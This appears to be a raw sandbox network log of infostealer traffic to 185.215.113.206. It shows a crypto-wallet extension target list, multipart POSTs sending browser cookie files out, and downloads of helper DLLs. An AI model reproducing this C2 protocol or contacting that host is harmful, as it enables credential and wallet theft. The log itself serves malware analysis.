Nov 5, 2024 10:13:21.423923969 CET	1236	IN	Data Raw: 61 6d 39 38 4d 58 77 77 66 44 42 38 55 32 39 73 5a 6d 78 68 63 6d 55 67 56 32 46 73 62 47 56 30 66 47 4a 6f 61 47 68 73 59 6d 56 77 5a 47 74 69 59 58 42 68 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 Data Ascii: am98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2p
Nov 5, 2024 10:13:21.423934937 CET	1236	IN	Data Raw: 5a 32 70 6c 62 57 56 72 5a 57 4a 6b 63 47 56 76 61 32 4a 70 61 32 68 6d 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 46 79 64 47 6c 68 62 69 42 42 63 48 52 76 63 79 42 58 59 57 78 73 5a 58 52 38 5a 57 5a 69 5a 32 78 6e 62 32 5a 76 61 58 42 77 59 6d Data Ascii: Z2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3B
Nov 5, 2024 10:13:21.423948050 CET	336	IN	Data Raw: 62 47 31 6e 59 57 35 6d 59 57 46 73 61 32 78 69 66 44 46 38 4d 48 77 77 66 45 4e 76 62 57 31 76 62 6b 74 6c 65 58 78 6a 61 47 64 6d 5a 57 5a 71 63 47 4e 76 59 6d 5a 69 62 6e 42 74 61 57 39 72 5a 6d 70 71 59 57 64 73 59 57 68 74 62 6d 52 6c 5a 48 Data Ascii: bG1nYW5mYWFsa2xifDF8MHwwfENvbW1vbktleXxjaGdmZWZqcGNvYmZibnBtaW9rZmpqYWdsYWhtbmRlZHwxfDB8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2ZuYmVrY2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR
Nov 5, 2024 10:13:21.424129009 CET	1236	IN	Data Raw: 61 6d 6c 72 59 57 70 6f 5a 6d 4a 76 62 57 68 73 62 57 31 76 62 47 78 77 61 47 4e 68 5a 48 77 78 66 44 42 38 4d 48 78 53 59 57 6c 75 59 6d 39 33 49 46 64 68 62 47 78 6c 64 48 78 76 63 47 5a 6e 5a 57 78 74 59 32 31 69 61 57 46 71 59 57 31 6c 63 47 Data Ascii: amlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHxSYWluYm93IFdhbGxldHxvcGZnZWxtY21iaWFqYW1lcG5tbG9pamJwb2xlaWFtYXwxfDB8MHxOaWdodGx5IFdhbGxldHxmaWlrb21tZGRiZWNjYW9pY29lam9uaWFtbW5hbGtmYXwxfDB8MHxFY3RvIFdhbGxldHxiZ2pvZ3BvaWRlamRlbWdvb2NocG5rbWRqcG9jZ2toYXw
Nov 5, 2024 10:13:21.424187899 CET	716	IN	Data Raw: 61 48 4a 76 62 57 6c 31 62 58 78 6a 61 57 39 71 62 32 4e 77 61 32 4e 73 5a 6d 5a 73 62 32 31 69 59 6d 4e 6d 61 57 64 6a 61 57 70 71 59 32 4a 72 62 57 68 68 5a 6e 77 78 66 44 42 38 4d 48 78 4e 59 57 64 70 59 79 42 46 5a 47 56 75 49 46 64 68 62 47 Data Ascii: aHJvbWl1bXxjaW9qb2Nwa2NsZmZsb21iYmNmaWdjaWpqY2JrbWhhZnwxfDB8MHxNYWdpYyBFZGVuIFdhbGxldHxta3BlZ2prYmxra2VmYWNmbm1rYWpjam1hYmlqaGNsZ3wxfDB8MHxCYWNrcGFjayBXYWxsZXR8YWZsa21maGViZWRiamlvaXBnbGdjYmNtbmJwZ2xpb2Z8MXwwfDB8VG9ua2VlcGVyIFdhbGxldHxvbWFhYmJ
Nov 5, 2024 10:13:21.425525904 CET	470	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKFHJDAEHIEHJJKFBGDA Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 48 4a 44 41 45 48 49 45 48 4a 4a 4b 46 42 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 63 64 62 30 38 64 37 32 36 30 66 37 30 32 34 65 65 35 63 33 38 36 62 39 39 61 30 30 64 65 61 65 61 35 37 32 34 65 31 37 66 34 61 33 35 39 30 38 39 33 30 66 32 32 62 61 33 62 64 34 62 39 61 38 30 31 37 62 63 33 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 48 4a 44 41 45 48 49 45 48 4a 4a 4b 46 42 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 48 4a 44 41 45 48 49 45 48 4a 4a 4b 46 42 47 44 41 2d 2d 0d 0a Data Ascii: ------KKFHJDAEHIEHJJKFBGDAContent-Disposition: form-data; name="token"6cdb08d7260f7024ee5c386b99a00deaea5724e17f4a35908930f22ba3bd4b9a8017bc30------KKFHJDAEHIEHJJKFBGDAContent-Disposition: form-data; name="message"fplugins------KKFHJDAEHIEHJJKFBGDA--
Nov 5, 2024 10:13:21.705297947 CET	335	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 09:13:21 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Nov 5, 2024 10:13:21.722318888 CET	203	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCFBGIDAEHCFIDGCBGII Host: 185.215.113.206 Content-Length: 6147 Connection: Keep-Alive Cache-Control: no-cache
Nov 5, 2024 10:13:21.722382069 CET	6147	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 43 46 42 47 49 44 41 45 48 43 46 49 44 47 43 42 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 63 64 62 30 38 Data Ascii: ------FCFBGIDAEHCFIDGCBGIIContent-Disposition: form-data; name="token"6cdb08d7260f7024ee5c386b99a00deaea5724e17f4a35908930f22ba3bd4b9a8017bc30------FCFBGIDAEHCFIDGCBGIIContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Nov 5, 2024 10:13:22.522922993 CET	202	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 09:13:21 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 5, 2024 10:13:22.812581062 CET	94	OUT	GET /746f34465cf17784/sqlite3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 5, 2024 10:13:23.117197990 CET	1236	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 09:13:22 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Nov 5, 2024 10:13:23.117209911 CET	1236	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 10:13:36.354357004 CET	629	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHCBAAAFHJDHJJKEBGHI Host: 185.215.113.206 Content-Length: 427 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 48 43 42 41 41 41 46 48 4a 44 48 4a 4a 4b 45 42 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 63 64 62 30 38 64 37 32 36 30 66 37 30 32 34 65 65 35 63 33 38 36 62 39 39 61 30 30 64 65 61 65 61 35 37 32 34 65 31 37 66 34 61 33 35 39 30 38 39 33 30 66 32 32 62 61 33 62 64 34 62 39 61 38 30 31 37 62 63 33 30 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 42 41 41 41 46 48 4a 44 48 4a 4a 4b 45 42 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 42 41 41 41 46 48 4a 44 48 4a 4a 4b 45 42 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED] Data Ascii: ------EHCBAAAFHJDHJJKEBGHIContent-Disposition: form-data; name="token"6cdb08d7260f7024ee5c386b99a00deaea5724e17f4a35908930f22ba3bd4b9a8017bc30------EHCBAAAFHJDHJJKEBGHIContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------EHCBAAAFHJDHJJKEBGHIContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------EHCBAAAFHJDHJJKEBGHI--
Nov 5, 2024 10:13:37.786010027 CET	203	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 09:13:37 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 5, 2024 10:13:37.906022072 CET	565	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGHJECAFIDAFHJKFCGHI Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 63 64 62 30 38 64 37 32 36 30 66 37 30 32 34 65 65 35 63 33 38 36 62 39 39 61 30 30 64 65 61 65 61 35 37 32 34 65 31 37 66 34 61 33 35 39 30 38 39 33 30 66 32 32 62 61 33 62 64 34 62 39 61 38 30 31 37 62 63 33 30 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------DGHJECAFIDAFHJKFCGHIContent-Disposition: form-data; name="token"6cdb08d7260f7024ee5c386b99a00deaea5724e17f4a35908930f22ba3bd4b9a8017bc30------DGHJECAFIDAFHJKFCGHIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------DGHJECAFIDAFHJKFCGHIContent-Disposition: form-data; name="file"------DGHJECAFIDAFHJKFCGHI--
Nov 5, 2024 10:13:38.687334061 CET	202	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 09:13:38 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 10:13:46.447470903 CET	203	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFIEHIIIJDAAAAAAKECB Host: 185.215.113.206 Content-Length: 3087 Connection: Keep-Alive Cache-Control: no-cache
Nov 5, 2024 10:13:46.447513103 CET	3087	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 63 64 62 30 38 Data Ascii: ------KFIEHIIIJDAAAAAAKECBContent-Disposition: form-data; name="token"6cdb08d7260f7024ee5c386b99a00deaea5724e17f4a35908930f22ba3bd4b9a8017bc30------KFIEHIIIJDAAAAAAKECBContent-Disposition: form-data; name="file_name"Y29va2llc1xNa
Nov 5, 2024 10:13:47.863162994 CET	203	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 09:13:47 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 5, 2024 10:13:48.020772934 CET	565	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHJKKECFIECAKECAFBGC Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 48 4a 4b 4b 45 43 46 49 45 43 41 4b 45 43 41 46 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 63 64 62 30 38 64 37 32 36 30 66 37 30 32 34 65 65 35 63 33 38 36 62 39 39 61 30 30 64 65 61 65 61 35 37 32 34 65 31 37 66 34 61 33 35 39 30 38 39 33 30 66 32 32 62 61 33 62 64 34 62 39 61 38 30 31 37 62 63 33 30 0d 0a 2d 2d 2d 2d 2d 2d 46 48 4a 4b 4b 45 43 46 49 45 43 41 4b 45 43 41 46 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 48 4a 4b 4b 45 43 46 49 45 43 41 4b 45 43 41 46 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------FHJKKECFIECAKECAFBGCContent-Disposition: form-data; name="token"6cdb08d7260f7024ee5c386b99a00deaea5724e17f4a35908930f22ba3bd4b9a8017bc30------FHJKKECFIECAKECAFBGCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FHJKKECFIECAKECAFBGCContent-Disposition: form-data; name="file"------FHJKKECFIECAKECAFBGC--
Nov 5, 2024 10:13:48.795718908 CET	202	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 09:13:48 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 5, 2024 10:13:49.619175911 CET	94	OUT	GET /746f34465cf17784/freebl3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 5, 2024 10:13:49.900912046 CET	1236	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 09:13:49 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Nov 5, 2024 10:13:49.900926113 CET	112	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 68 4f 01 00 00 e8 f2 0b 08 00 83 c4 04 85 c0 74 0e 89 80 38 01 00 00 83 c0 0f 83 e0 f0 5d c3 68 13 e0 ff ff e8 c7 0b Data Ascii: UhOt8]h1]UWVE
Nov 5, 2024 10:13:49.900935888 CET	1236	IN	Data Raw: 85 c0 74 1e 8b 75 1c 8b 7d 14 8b 55 10 8b 4d 0c 85 ff 74 22 f2 0f 10 07 f2 0f 11 80 30 01 00 00 eb 28 68 05 e0 ff ff e8 7f 0b 08 00 83 c4 04 b8 ff ff ff ff eb 26 c7 80 34 01 00 00 a6 a6 a6 a6 c7 80 30 01 00 00 a6 a6 a6 a6 6a 10 56 6a 00 6a 00 52 Data Ascii: tu}UMt"0(h&40jVjjRQP?^_]USWVhO?t081tkEU]Mt0%h1<40jRjjPQWt8
Nov 5, 2024 10:13:49.900947094 CET	1236	IN	Data Raw: 00 0f 84 98 02 00 00 8b 75 18 85 f6 0f 84 8d 02 00 00 89 54 24 34 89 44 24 30 89 f8 83 e0 f8 50 e8 88 06 08 00 83 c4 04 85 c0 0f 84 7c 02 00 00 89 c3 89 f8 c1 ef 03 8d 4f ff 89 4c 24 38 50 56 53 e8 27 07 08 00 83 c4 0c f2 0f 10 03 f2 0f 11 44 24 Data Ascii: uT$4D$0P\|OL$8PVS'D$@?@L$L$D$D$D$$D$ 11\$($D$T$L$D$D$t$8D$D$@L$T$\|$
Nov 5, 2024 10:13:49.900959015 CET	1236	IN	Data Raw: 89 45 d8 8d 45 dc 89 f9 31 d2 ff 75 1c ff 75 18 53 50 56 8d 45 e0 50 e8 b4 fa ff ff 83 c4 18 89 c7 85 ff 0f 85 6f 01 00 00 b9 01 e0 ff ff 39 5d dc 0f 85 53 01 00 00 8b 55 e0 0f ca b8 a6 59 59 a6 29 d0 81 c2 5a a6 a6 59 09 c2 0f b6 45 e4 0f b6 4d Data Ascii: EE1uuSPVEPo9]SUYY)ZYEME]M)19DEEE\|0)U\|2!!)]\|3)\|3!)
Nov 5, 2024 10:13:49.900969982 CET	1236	IN	Data Raw: 8c 00 00 00 8b 55 ac 89 c8 31 db 39 ca 74 3c 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 0f b6 0c 07 30 4c 06 0c 0f b6 0c 07 30 8c 06 8c 00 00 00 0f b6 4c 07 01 30 4c 06 0d 0f b6 4c 07 01 30 8c 06 8d 00 00 00 83 c0 02 39 c2 75 d1 8b 4d f0 31 e9 e8 37 Data Ascii: U19t<f.0L0L0LL09uM17L^_[]USWVh1tlEGGHt1Uuut,tGHjSGW:G
Nov 5, 2024 10:13:49.900980949 CET	448	IN	Data Raw: ff 8b 75 08 8a 04 0e 88 06 c6 04 0e 00 b8 02 00 00 00 66 0f 1f 44 00 00 0f b6 54 06 ff 0f b6 f9 01 d7 0f b6 8c 05 ef fe ff ff 01 f9 0f b6 f9 0f b6 1c 3e 88 5c 06 ff 88 14 3e 3d 00 01 00 00 74 25 0f b6 14 06 0f b6 f9 01 d7 0f b6 8c 05 f0 fe ff ff Data Ascii: ufDT>\>=t%>>f1hM1)^_[]USWV01Eh1E=s hk
Nov 5, 2024 10:13:49.901052952 CET	1236	IN	Data Raw: 3e 83 c0 02 eb b2 66 c7 86 00 01 00 00 00 00 89 f7 8b 4d f0 31 e9 e8 dd f4 07 00 89 f8 81 c4 08 01 00 00 5e 5f 5b 5d c3 55 89 e5 83 7d 0c 00 74 10 68 02 01 00 00 ff 75 08 e8 6f f6 07 00 83 c4 08 5d c3 cc cc cc cc cc 55 89 e5 56 8b 75 1c 8b 45 14 Data Ascii: >fM1^_[]U}thuo]UVuE9sh;UMVuPu^]USWV4MEE9EshyU}]E}}aM}
Nov 5, 2024 10:13:49.901070118 CET	1236	IN	Data Raw: f4 e9 66 0f 70 f5 e8 66 0f 70 c9 f5 66 0f f4 cc 66 0f 70 c9 e8 66 0f 62 f1 66 0f eb f2 66 0f 6f d0 66 0f fe 15 f0 20 08 10 83 c8 08 66 0f 6e 0c 07 66 0f 60 cb 66 0f 61 cb 66 0f 72 f2 17 66 0f 6f 2d e0 20 08 10 66 0f fe d5 f3 0f 5b d2 66 0f 70 e1 Data Ascii: fpfpffpfbffof fnf`fafrfo- f[fpffpffof%!fpfpfbfnTf`faffrf[fpffpffpfpfbff!~sMEMEUxE
Nov 5, 2024 10:13:49.901079893 CET	224	IN	Data Raw: 8b 45 e8 8b 4d ec 8d 4c 01 02 0f b6 c9 8b 45 f0 0f b6 14 08 00 d3 0f b6 f3 8b 45 f0 0f b6 04 30 8b 7d f0 88 04 0f 8b 4d f0 88 14 31 00 d0 0f b6 c0 8b 4d f0 0f b6 0c 01 c1 e1 08 03 4d cc 8b 45 e8 8b 55 ec 01 d0 83 c0 03 0f b6 c0 8b 55 f0 0f b6 14 Data Ascii: EMLEE0}M1MMEUU}47}4E0UMUU}47}4M1uU3UMEM}}Eu
Nov 5, 2024 10:13:53.122679949 CET	94	OUT	GET /746f34465cf17784/mozglue.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 5, 2024 10:13:53.405164957 CET	1236	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 09:13:53 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 